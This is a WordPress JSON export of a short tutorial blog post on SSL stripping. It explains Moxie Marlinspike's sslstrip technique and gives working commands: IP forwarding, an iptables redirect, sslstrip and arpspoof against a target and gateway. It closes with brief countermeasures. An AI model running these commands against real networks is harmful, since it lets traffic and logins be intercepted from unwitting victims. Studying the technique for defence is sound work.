{"id":1394,"date":"2018-08-24T10:44:52","date_gmt":"2018-08-24T10:44:52","guid":{"rendered":"http:\/\/www.max-sperling.bplaced.net\/?p=1394"},"modified":"2024-02-20T11:45:28","modified_gmt":"2024-02-20T11:45:28","slug":"ssl-stripping","status":"publish","type":"post","link":"http:\/\/www.max-sperling.bplaced.net\/?p=1394","title":{"rendered":"SSL-Stripping"},"content":{"rendered":"<p>Let&#8217;s say you are already a Man-In-The-Middle for example based on ARP-Spoofing or a Rogue AP. Now you are sniffing the traffic, but the problem is that most of the web servers just communicate via HTTPS. Then it&#8217;s time to try SSL-Stipping.<\/p>\n<hr>\n<p><strong>General overview:<\/strong><br \/>\nThe concept was introduced by Moxie Marlinspike and shown by him at the Black Hat DC 2009. Afterwards he has developed a tool which executes his concept and it&#8217;s called sslstrip.<br \/>\n<br \/><center>[Victim] <--HTTP--> [MITM] <--HTTPS--> [Server]<\/center><br \/>\nIf your victim requests a website via HTTP we are able to setup an HTTPS request to the web server. It&#8217;s not gonna work if the victim requests it via HTTPS. As soon as we got a response from the web server we bring all links from &#8220;https:\/\/&#8230;&#8221; to &#8220;http:\/\/&#8230;&#8221; and sending it via HTTP back to the victim.<\/p>\n<hr>\n<p><strong>Example (arpspoof):<\/strong><\/p>\n<pre class=\"brush: plain; gutter: false; title: ; notranslate\" title=\"\">\r\n$ echo &quot;1&quot; &gt; \/proc\/sys\/net\/ipv4\/ip_forward\r\n$ iptables -t nat -A PREROUTING -p tcp --destination-port 80\r\n -j REDIRECT --to-port &lt;listenPort&gt;\r\n$ sslstrip -l &lt;listenPort&gt;\r\n$ arpspoof -i &lt;interface&gt; -t &lt;targetIP&gt; &lt;gatewayIP&gt;\r\n<\/pre>\n<p><a href=\"https:\/\/moxie.org\/software\/sslstrip\/\">Website from Moxie Marlinspike<\/a><\/p>\n<hr>\n<p><strong>Countermeasures:<\/strong><br \/>\n&#8211; Change you browsers settings to just communicate when SSL is active<br \/>\n&#8211; Set up you own or use a trusted VPN service for your web communication<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Let&#8217;s say you are already a Man-In-The-Middle for example based on ARP-Spoofing or a Rogue AP. Now you are sniffing<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[26],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1394"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1394"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1394\/revisions"}],"predecessor-version":[{"id":16956,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1394\/revisions\/16956"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1394"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}